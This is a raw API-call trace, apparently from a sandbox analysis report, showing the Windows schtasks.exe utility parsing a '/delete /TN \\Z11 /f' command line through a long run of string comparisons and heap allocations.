[0380.378] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|query|") returned 7
[0380.378] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.378] lstrlenW (lpString="|query|") returned 7
[0380.378] lstrlenW (lpString="|TN|") returned 4
[0380.378] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0380.378] SetLastError (dwErrCode=0x490)
[0380.378] lstrlenW (lpString="change") returned 6
[0380.378] lstrlenW (lpString="change") returned 6
[0380.378] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.378] lstrlenW (lpString="TN") returned 2
[0380.379] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.379] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|change|") returned 8
[0380.379] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.379] lstrlenW (lpString="|change|") returned 8
[0380.379] lstrlenW (lpString="|TN|") returned 4
[0380.379] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0380.379] SetLastError (dwErrCode=0x490)
[0380.379] lstrlenW (lpString="run") returned 3
[0380.379] lstrlenW (lpString="run") returned 3
[0380.379] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.379] lstrlenW (lpString="TN") returned 2
[0380.379] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.380] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|run|") returned 5
[0380.380] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.380] lstrlenW (lpString="|run|") returned 5
[0380.380] lstrlenW (lpString="|TN|") returned 4
[0380.380] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0380.380] SetLastError (dwErrCode=0x490)
[0380.380] lstrlenW (lpString="end") returned 3
[0380.380] lstrlenW (lpString="end") returned 3
[0380.380] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.380] lstrlenW (lpString="TN") returned 2
[0380.380] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.381] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|end|") returned 5
[0380.381] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.381] lstrlenW (lpString="|end|") returned 5
[0380.381] lstrlenW (lpString="|TN|") returned 4
[0380.381] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0380.381] SetLastError (dwErrCode=0x490)
[0380.381] lstrlenW (lpString="showsid") returned 7
[0380.381] lstrlenW (lpString="showsid") returned 7
[0380.381] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.381] GetProcessHeap () returned 0x80000
[0380.381] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2d0) returned 1
[0380.381] GetProcessHeap () returned 0x80000
[0380.381] RtlReAllocateHeap (Heap=0x80000, Flags=0xc, Ptr=0x9c2d0, Size=0x16) returned 0x9c2d0
[0380.382] lstrlenW (lpString="TN") returned 2
[0380.382] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.382] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|showsid|") returned 9
[0380.382] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.382] lstrlenW (lpString="|showsid|") returned 9
[0380.382] lstrlenW (lpString="|TN|") returned 4
[0380.382] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0380.382] SetLastError (dwErrCode=0x490)
[0380.382] SetLastError (dwErrCode=0x490)
[0380.382] SetLastError (dwErrCode=0x0)
[0380.382] lstrlenW (lpString="/TN") returned 3
[0380.382] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0380.383] SetLastError (dwErrCode=0x490)
[0380.383] SetLastError (dwErrCode=0x0)
[0380.383] lstrlenW (lpString="/TN") returned 3
[0380.383] GetProcessHeap () returned 0x80000
[0380.383] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x8) returned 0x9c270
[0380.383] GetProcessHeap () returned 0x80000
[0380.383] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9ccd0
[0380.383] SetLastError (dwErrCode=0x0)
[0380.383] SetLastError (dwErrCode=0x0)
[0380.383] lstrlenW (lpString="\\Z11") returned 4
[0380.383] lstrlenW (lpString="-/") returned 2
[0380.383] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0380.383] SetLastError (dwErrCode=0x490)
[0380.383] SetLastError (dwErrCode=0x490)
[0380.383] SetLastError (dwErrCode=0x0)
[0380.384] lstrlenW (lpString="\\Z11") returned 4
[0380.384] StrChrIW (lpStart="\\Z11", wMatch=0x3a) returned 0x0
[0380.384] SetLastError (dwErrCode=0x490)
[0380.384] SetLastError (dwErrCode=0x0)
[0380.384] lstrlenW (lpString="\\Z11") returned 4
[0380.384] GetProcessHeap () returned 0x80000
[0380.384] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0xa) returned 0x9c300
[0380.385] GetProcessHeap () returned 0x80000
[0380.385] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cd00
[0380.385] SetLastError (dwErrCode=0x0)
[0380.385] SetLastError (dwErrCode=0x0)
[0380.386] lstrlenW (lpString="/f") returned 2
[0380.386] lstrlenW (lpString="-/") returned 2
[0380.386] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.386] lstrlenW (lpString="?") returned 1
[0380.386] lstrlenW (lpString="?") returned 1
[0380.386] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.386] lstrlenW (lpString="f") returned 1
[0380.386] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.386] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|?|") returned 3
[0380.386] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.386] lstrlenW (lpString="|?|") returned 3
[0380.386] lstrlenW (lpString="|f|") returned 3
[0380.387] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0380.387] SetLastError (dwErrCode=0x490)
[0380.387] lstrlenW (lpString="create") returned 6
[0380.387] lstrlenW (lpString="create") returned 6
[0380.387] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.387] lstrlenW (lpString="f") returned 1
[0380.387] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.388] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|create|") returned 8
[0380.388] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.388] lstrlenW (lpString="|create|") returned 8
[0380.388] lstrlenW (lpString="|f|") returned 3
[0380.388] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0380.388] SetLastError (dwErrCode=0x490)
[0380.388] lstrlenW (lpString="delete") returned 6
[0380.388] lstrlenW (lpString="delete") returned 6
[0380.388] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.388] lstrlenW (lpString="f") returned 1
[0380.388] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.389] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|delete|") returned 8
[0380.389] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.389] lstrlenW (lpString="|delete|") returned 8
[0380.389] lstrlenW (lpString="|f|") returned 3
[0380.389] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0380.389] SetLastError (dwErrCode=0x490)
[0380.389] lstrlenW (lpString="query") returned 5
[0380.389] lstrlenW (lpString="query") returned 5
[0380.389] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.389] lstrlenW (lpString="f") returned 1
[0380.389] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.389] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|query|") returned 7
[0380.390] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.390] lstrlenW (lpString="|query|") returned 7
[0380.390] lstrlenW (lpString="|f|") returned 3
[0380.390] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0380.390] SetLastError (dwErrCode=0x490)
[0380.390] lstrlenW (lpString="change") returned 6
[0380.390] lstrlenW (lpString="change") returned 6
[0380.390] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.390] lstrlenW (lpString="f") returned 1
[0380.390] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.390] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|change|") returned 8
[0380.390] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.390] lstrlenW (lpString="|change|") returned 8
[0380.391] lstrlenW (lpString="|f|") returned 3
[0380.391] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0380.391] SetLastError (dwErrCode=0x490)
[0380.391] lstrlenW (lpString="run") returned 3
[0380.391] lstrlenW (lpString="run") returned 3
[0380.391] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.391] lstrlenW (lpString="f") returned 1
[0380.391] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.391] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|run|") returned 5
[0380.391] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.391] lstrlenW (lpString="|run|") returned 5
[0380.391] lstrlenW (lpString="|f|") returned 3
[0380.392] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0380.392] SetLastError (dwErrCode=0x490)
[0380.392] lstrlenW (lpString="end") returned 3
[0380.392] lstrlenW (lpString="end") returned 3
[0380.392] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.392] lstrlenW (lpString="f") returned 1
[0380.392] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.392] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|end|") returned 5
[0380.392] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.392] lstrlenW (lpString="|end|") returned 5
[0380.392] lstrlenW (lpString="|f|") returned 3
[0380.392] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0380.392] SetLastError (dwErrCode=0x490)
[0380.392] lstrlenW (lpString="showsid") returned 7
[0380.393] lstrlenW (lpString="showsid") returned 7
[0380.393] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.393] lstrlenW (lpString="f") returned 1
[0380.393] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.393] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|showsid|") returned 9
[0380.393] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|f|") returned 3
[0380.393] lstrlenW (lpString="|showsid|") returned 9
[0380.393] lstrlenW (lpString="|f|") returned 3
[0380.393] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0380.393] SetLastError (dwErrCode=0x490)
[0380.393] SetLastError (dwErrCode=0x490)
[0380.393] SetLastError (dwErrCode=0x0)
[0380.394] lstrlenW (lpString="/f") returned 2
[0380.394] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0380.394] SetLastError (dwErrCode=0x490)
[0380.394] SetLastError (dwErrCode=0x0)
[0380.394] lstrlenW (lpString="/f") returned 2
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x6) returned 0x9c320
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cd30
[0380.394] SetLastError (dwErrCode=0x0)
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270) returned 1
[0380.394] GetProcessHeap () returned 0x80000
[0380.394] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c270) returned 0x8
[0380.395] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270 | out: hHeap=0x80000) returned 1
[0380.395] GetProcessHeap () returned 0x80000
[0380.395] GetProcessHeap () returned 0x80000
[0380.395] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ccd0) returned 1
[0380.395] GetProcessHeap () returned 0x80000
[0380.395] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ccd0) returned 0x20
[0380.395] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ccd0 | out: hHeap=0x80000) returned 1
[0380.395] GetProcessHeap () returned 0x80000
[0380.395] GetProcessHeap () returned 0x80000
[0380.396] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c300) returned 1
[0380.396] GetProcessHeap () returned 0x80000
[0380.396] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c300) returned 0xa
[0380.396] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c300 | out: hHeap=0x80000) returned 1
[0380.396] GetProcessHeap () returned 0x80000
[0380.396] GetProcessHeap () returned 0x80000
[0380.396] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd00) returned 1
[0380.396] GetProcessHeap () returned 0x80000
[0380.396] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cd00) returned 0x20
[0380.396] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd00 | out: hHeap=0x80000) returned 1
[0380.396] GetProcessHeap () returned 0x80000
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c320) returned 1
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c320) returned 0x6
[0380.397] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c320 | out: hHeap=0x80000) returned 1
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd30) returned 1
[0380.397] GetProcessHeap () returned 0x80000
[0380.397] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cd30) returned 0x20
[0380.397] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd30 | out: hHeap=0x80000) returned 1
[0380.397] GetProcessHeap () returned 0x80000
[0380.398] GetProcessHeap () returned 0x80000
[0380.398] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba40) returned 1
[0380.398] GetProcessHeap () returned 0x80000
[0380.398] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ba40) returned 0x18
[0380.398] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba40 | out: hHeap=0x80000) returned 1
[0380.398] SetLastError (dwErrCode=0x0)
[0380.398] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0380.398] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0380.399] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0380.399] VerifyVersionInfoW (in: lpVersionInformation=0x24eef0, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24eef0) returned 1
[0380.399] SetLastError (dwErrCode=0x0)
[0380.399] lstrlenW (lpString="delete") returned 6
[0380.399] StrChrIW (lpStart="delete", wMatch=0x7c) returned 0x0
[0380.399] SetLastError (dwErrCode=0x490)
[0380.399] SetLastError (dwErrCode=0x0)
[0380.399] lstrlenW (lpString="delete") returned 6
[0380.399] GetProcessHeap () returned 0x80000
[0380.399] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cd30
[0380.399] GetProcessHeap () returned 0x80000
[0380.399] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9ba40
[0380.399] _memicmp (_Buf1=0x9ba40, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.399] GetProcessHeap () returned 0x80000
[0380.399] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x16) returned 0x9c270
[0380.400] SetLastError (dwErrCode=0x0)
[0380.400] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.400] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9bca0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0380.400] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0380.400] GetProcessHeap () returned 0x80000
[0380.401] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x74e) returned 0x9d560
[0380.401] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x9d560 | out: lpData=0x9d560) returned 1
[0380.401] VerQueryValueW (in: pBlock=0x9d560, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24efd8, puLen=0x24f040 | out: lplpBuffer=0x24efd8*=0x9d8fc, puLen=0x24f040) returned 1
[0380.401] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.401] _vsnwprintf (in: _Buffer=0x9bca0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24efb8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0380.401] VerQueryValueW (in: pBlock=0x9d560, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f048, puLen=0x24f038 | out: lplpBuffer=0x24f048*=0x9d728, puLen=0x24f038) returned 1
[0380.401] lstrlenW (lpString="schtasks.exe") returned 12
[0380.401] lstrlenW (lpString="schtasks.exe") returned 12
[0380.401] lstrlenW (lpString=".EXE") returned 4
[0380.402] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0380.402] lstrlenW (lpString="schtasks.exe") returned 12
[0380.402] lstrlenW (lpString=".EXE") returned 4
[0380.402] lstrlenW (lpString="schtasks") returned 8
[0380.402] lstrlenW (lpString="/delete") returned 7
[0380.402] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.430] _vsnwprintf (in: _Buffer=0x9bca0, _BufferCount=0x19, _Format="%s %s", _ArgList=0x24efb8 | out: _Buffer="schtasks /delete") returned 16
[0380.437] _memicmp (_Buf1=0x9bb20, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.437] GetProcessHeap () returned 0x80000
[0380.437] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cd00
[0380.437] _memicmp (_Buf1=0x9bb40, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.437] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x9d350, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0380.438] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0380.438] GetProcessHeap () returned 0x80000
[0380.438] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x30) returned 0x97c90
[0380.438] _vsnwprintf (in: _Buffer=0x9c0a0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24efb8 | out: _Buffer="Type \"SCHTASKS /DELETE /?\" for usage.") returned 37
[0380.438] GetProcessHeap () returned 0x80000
[0380.438] GetProcessHeap () returned 0x80000
[0380.438] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9d560) returned 1
[0380.438] GetProcessHeap () returned 0x80000
[0380.438] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9d560) returned 0x74e
[0380.438] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9d560 | out: hHeap=0x80000) returned 1
[0380.438] SetLastError (dwErrCode=0x0)
[0380.438] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="delete") returned 6
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="?") returned 1
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="s") returned 1
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="u") returned 1
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.439] lstrlenW (lpString="p") returned 1
[0380.439] GetThreadLocale () returned 0x409
[0380.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.440] lstrlenW (lpString="tn") returned 2
[0380.440] GetThreadLocale () returned 0x409
[0380.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.440] lstrlenW (lpString="f") returned 1
[0380.440] SetLastError (dwErrCode=0x0)
[0380.440] SetLastError (dwErrCode=0x0)
[0380.440] lstrlenW (lpString="/Delete") returned 7
[0380.440] lstrlenW (lpString="-/") returned 2
[0380.440] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.440] lstrlenW (lpString="delete") returned 6
[0380.440] lstrlenW (lpString="delete") returned 6
[0380.440] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.440] lstrlenW (lpString="Delete") returned 6
[0380.440] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.441] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|delete|") returned 8
[0380.441] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|Delete|") returned 8
[0380.441] lstrlenW (lpString="|delete|") returned 8
[0380.441] lstrlenW (lpString="|Delete|") returned 8
[0380.441] StrStrIW (lpFirst="|delete|", lpSrch="|Delete|") returned="|delete|"
[0380.441] SetLastError (dwErrCode=0x0)
[0380.441] SetLastError (dwErrCode=0x0)
[0380.441] SetLastError (dwErrCode=0x0)
[0380.441] lstrlenW (lpString="/TN") returned 3
[0380.441] lstrlenW (lpString="-/") returned 2
[0380.441] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.441] lstrlenW (lpString="delete") returned 6
[0380.441] lstrlenW (lpString="delete") returned 6
[0380.442] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.442] lstrlenW (lpString="TN") returned 2
[0380.442] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.442] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|delete|") returned 8
[0380.442] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.442] lstrlenW (lpString="|delete|") returned 8
[0380.442] lstrlenW (lpString="|TN|") returned 4
[0380.442] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0380.442] SetLastError (dwErrCode=0x490)
[0380.442] lstrlenW (lpString="?") returned 1
[0380.442] lstrlenW (lpString="?") returned 1
[0380.442] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.443] lstrlenW (lpString="TN") returned 2
[0380.443] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.443] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|?|") returned 3
[0380.443] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.443] lstrlenW (lpString="|?|") returned 3
[0380.443] lstrlenW (lpString="|TN|") returned 4
[0380.443] SetLastError (dwErrCode=0x490)
[0380.443] lstrlenW (lpString="s") returned 1
[0380.443] lstrlenW (lpString="s") returned 1
[0380.443] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.443] lstrlenW (lpString="TN") returned 2
[0380.443] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.444] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|s|") returned 3
[0380.444] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.444] lstrlenW (lpString="|s|") returned 3
[0380.444] lstrlenW (lpString="|TN|") returned 4
[0380.444] SetLastError (dwErrCode=0x490)
[0380.444] lstrlenW (lpString="u") returned 1
[0380.444] lstrlenW (lpString="u") returned 1
[0380.444] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.444] lstrlenW (lpString="TN") returned 2
[0380.444] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.444] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|u|") returned 3
[0380.444] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.444] lstrlenW (lpString="|u|") returned 3
[0380.444] lstrlenW (lpString="|TN|") returned 4
